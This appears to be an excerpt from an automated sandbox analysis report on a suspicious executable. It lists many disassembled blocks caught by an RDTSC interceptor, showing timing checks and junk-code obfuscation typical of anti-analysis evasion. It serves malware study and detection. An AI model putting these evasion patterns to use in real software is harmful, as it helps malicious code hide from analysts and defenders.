                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE301 second address: 4BE30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F8B150D74E6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE30E second address: 4BE312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2C7B second address: 4C2C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F8B150D74E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2C89 second address: 4C2C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2F89 second address: 4C2FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 jmp 00007F8B150D74EFh 0x0000000d jmp 00007F8B150D74F9h 0x00000012 pop edx 0x00000013 jnp 00007F8B150D74E8h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2FC2 second address: 4C2FCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8B146BCD56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2FCE second address: 4C2FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2FD2 second address: 4C2FD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C313D second address: 4C3151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8B150D74ECh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C354A second address: 4C355F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B146BCD5Dh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C71F8 second address: 4C7202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7202 second address: 341A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 1700900Ah 0x0000000d push eax 0x0000000e mov edx, dword ptr [ebp+122D1963h] 0x00000014 pop edx 0x00000015 push dword ptr [ebp+122D0421h] 0x0000001b mov dword ptr [ebp+122D1987h], ebx 0x00000021 call dword ptr [ebp+122D1BC1h] 0x00000027 pushad 0x00000028 xor dword ptr [ebp+122D218Ch], ecx 0x0000002e xor eax, eax 0x00000030 jnl 00007F8B146BCD65h 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a sub dword ptr [ebp+122D218Ch], edi 0x00000040 mov dword ptr [ebp+122D2B01h], eax 0x00000046 jns 00007F8B146BCD5Fh 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D218Ch], edi 0x00000057 sub dword ptr [ebp+122D218Ch], esi 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 add dword ptr [ebp+122D218Ch], ebx 0x00000067 lodsw 0x00000069 jnp 00007F8B146BCD5Ch 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 jne 00007F8B146BCD5Ch 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d sub dword ptr [ebp+122D218Ch], ebx 0x00000083 pushad 0x00000084 add dword ptr [ebp+122D19ADh], edx 0x0000008a add edx, 33F31554h 0x00000090 popad 0x00000091 push eax 0x00000092 push eax 0x00000093 push edx 0x00000094 pushad 0x00000095 push eax 0x00000096 push edx 0x00000097 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7267 second address: 4C72D0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8B150D74FDh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d movzx edi, bx 0x00000010 jmp 00007F8B150D74ECh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F8B150D74E8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov si, ACDCh 0x00000035 push 75E7CCD1h 0x0000003a jo 00007F8B150D74EEh 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C72D0 second address: 4C7335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 xor dword ptr [esp], 75E7CC51h 0x0000000c movzx edi, di 0x0000000f push 00000003h 0x00000011 movzx ecx, si 0x00000014 push 00000000h 0x00000016 add dword ptr [ebp+122D1ADDh], ecx 0x0000001c push 00000003h 0x0000001e push BF3959B3h 0x00000023 push ebx 0x00000024 push eax 0x00000025 pushad 0x00000026 popad 0x00000027 pop eax 0x00000028 pop ebx 0x00000029 xor dword ptr [esp], 7F3959B3h 0x00000030 mov dword ptr [ebp+122D19E2h], esi 0x00000036 lea ebx, dword ptr [ebp+1245916Ch] 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 jmp 00007F8B146BCD68h 0x00000045 jmp 00007F8B146BCD5Ch 0x0000004a popad 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C741F second address: 4C7434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7434 second address: 4C746C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a jmp 00007F8B146BCD64h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F8B146BCD5Eh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C746C second address: 4C7470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7470 second address: 4C7511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F8B146BCD58h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 sub edi, dword ptr [ebp+122D29A1h] 0x00000028 push 00000003h 0x0000002a mov cl, C0h 0x0000002c push 00000000h 0x0000002e je 00007F8B146BCD5Ch 0x00000034 and esi, dword ptr [ebp+122D2891h] 0x0000003a push 00000003h 0x0000003c call 00007F8B146BCD60h 0x00000041 mov dword ptr [ebp+122D1860h], eax 0x00000047 pop esi 0x00000048 mov dword ptr [ebp+122D185Ah], ecx 0x0000004e push 8D582125h 0x00000053 ja 00007F8B146BCD5Eh 0x00000059 add dword ptr [esp], 32A7DEDBh 0x00000060 mov esi, 1419A800h 0x00000065 lea ebx, dword ptr [ebp+12459175h] 0x0000006b cld 0x0000006c xchg eax, ebx 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F8B146BCD67h 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7511 second address: 4C7522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7574 second address: 4C7582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7582 second address: 4C7588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7588 second address: 4C7656 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8B146BCD69h 0x00000008 jnl 00007F8B146BCD56h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 jl 00007F8B146BCD5Bh 0x00000018 push 00000000h 0x0000001a mov di, ax 0x0000001d call 00007F8B146BCD59h 0x00000022 jnp 00007F8B146BCD63h 0x00000028 push eax 0x00000029 pushad 0x0000002a jnp 00007F8B146BCD6Ch 0x00000030 pushad 0x00000031 jmp 00007F8B146BCD66h 0x00000036 push eax 0x00000037 pop eax 0x00000038 popad 0x00000039 popad 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e pushad 0x0000003f jmp 00007F8B146BCD5Dh 0x00000044 je 00007F8B146BCD58h 0x0000004a push eax 0x0000004b pop eax 0x0000004c popad 0x0000004d mov eax, dword ptr [eax] 0x0000004f pushad 0x00000050 push edx 0x00000051 push edx 0x00000052 pop edx 0x00000053 pop edx 0x00000054 pushad 0x00000055 pushad 0x00000056 popad 0x00000057 jmp 00007F8B146BCD62h 0x0000005c popad 0x0000005d popad 0x0000005e mov dword ptr [esp+04h], eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push edx 0x00000067 pop edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7656 second address: 4C766C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B150D74F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C766C second address: 4C7706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F8B146BCD58h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 call 00007F8B146BCD5Fh 0x00000028 mov dword ptr [ebp+122D1ADDh], esi 0x0000002e pop ecx 0x0000002f push 00000003h 0x00000031 mov edi, dword ptr [ebp+122D28C5h] 0x00000037 push 00000000h 0x00000039 jmp 00007F8B146BCD66h 0x0000003e push 00000003h 0x00000040 jmp 00007F8B146BCD5Eh 0x00000045 call 00007F8B146BCD59h 0x0000004a jmp 00007F8B146BCD5Ah 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 jmp 00007F8B146BCD5Eh 0x0000005a popad 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7706 second address: 4C7710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F8B150D74E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7710 second address: 4C7791 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8B146BCD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jbe 00007F8B146BCD69h 0x00000016 jmp 00007F8B146BCD63h 0x0000001b mov eax, dword ptr [eax] 0x0000001d jc 00007F8B146BCD5Ah 0x00000023 push eax 0x00000024 pushad 0x00000025 popad 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b pushad 0x0000002c push eax 0x0000002d jp 00007F8B146BCD56h 0x00000033 pop eax 0x00000034 jmp 00007F8B146BCD67h 0x00000039 popad 0x0000003a pop eax 0x0000003b sub dword ptr [ebp+122D219Ah], edi 0x00000041 mov ecx, 7AAF27B9h 0x00000046 lea ebx, dword ptr [ebp+12459180h] 0x0000004c sbb edi, 5252CCF0h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F8B146BCD5Ch 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8869 second address: 4E886F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E886F second address: 4E8873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8873 second address: 4E8879 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8879 second address: 4E889F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jg 00007F8B146BCD56h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8B146BCD66h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E889F second address: 4E88A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E88A5 second address: 4E88A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E88A9 second address: 4E88C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B150D74F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E88C2 second address: 4E88C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E88C8 second address: 4E88CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E66BC second address: 4E66CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD5Bh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E66CE second address: 4E66D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E685E second address: 4E6878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 jmp 00007F8B146BCD5Eh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6B36 second address: 4E6B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B150D74F0h 0x00000009 je 00007F8B150D74E6h 0x0000000f popad 0x00000010 jmp 00007F8B150D74EEh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6B5F second address: 4E6B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6B67 second address: 4E6B7C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8B150D74E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F8B150D750Ah 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6B7C second address: 4E6B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6CF6 second address: 4E6D13 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8B150D74F0h 0x00000008 jmp 00007F8B150D74EAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007F8B150D7508h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6D13 second address: 4E6D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6FF4 second address: 4E6FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E716B second address: 4E7179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F8B146BCD5Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E72FA second address: 4E730F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8B150D74ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E730F second address: 4E7313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF1A2 second address: 4AF1AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF1AA second address: 4AF1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B146BCD65h 0x00000009 popad 0x0000000a jc 00007F8B146BCD5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF1CC second address: 4AF1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8224 second address: 4E8261 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8B146BCD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007F8B146BCD62h 0x00000010 pop esi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8B146BCD5Ch 0x0000001b jmp 00007F8B146BCD5Eh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8261 second address: 4E8271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F8B150D74EAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E83F3 second address: 4E83F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E83F7 second address: 4E840E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B150D74EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E840E second address: 4E8414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8414 second address: 4E8419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED7F1 second address: 4ED7F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED7F7 second address: 4ED7FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED7FB second address: 4ED826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jnp 00007F8B146BCD64h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jnc 00007F8B146BCD5Eh 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0A4 second address: 4EC0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC809 second address: 4EC813 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8B146BCD5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED8FA second address: 4ED900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED900 second address: 4ED906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F440E second address: 4F4414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4414 second address: 4F444F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F8B146BCD60h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F8B146BCD71h 0x00000015 jmp 00007F8B146BCD60h 0x0000001a jmp 00007F8B146BCD5Bh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F444F second address: 4F4467 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8B150D74ECh 0x00000008 jp 00007F8B150D74E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 jbe 00007F8B150D74E6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3AE8 second address: 4F3B03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD65h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3C8A second address: 4F3CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jno 00007F8B150D74E6h 0x0000000b jmp 00007F8B150D74F3h 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F410B second address: 4F410F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F410F second address: 4F4115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4115 second address: 4F4121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4121 second address: 4F413D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B150D74F8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F413D second address: 4F4162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F8B146BCD5Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F42B0 second address: 4F42C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8B150D74EDh 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F61EB second address: 4F61EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
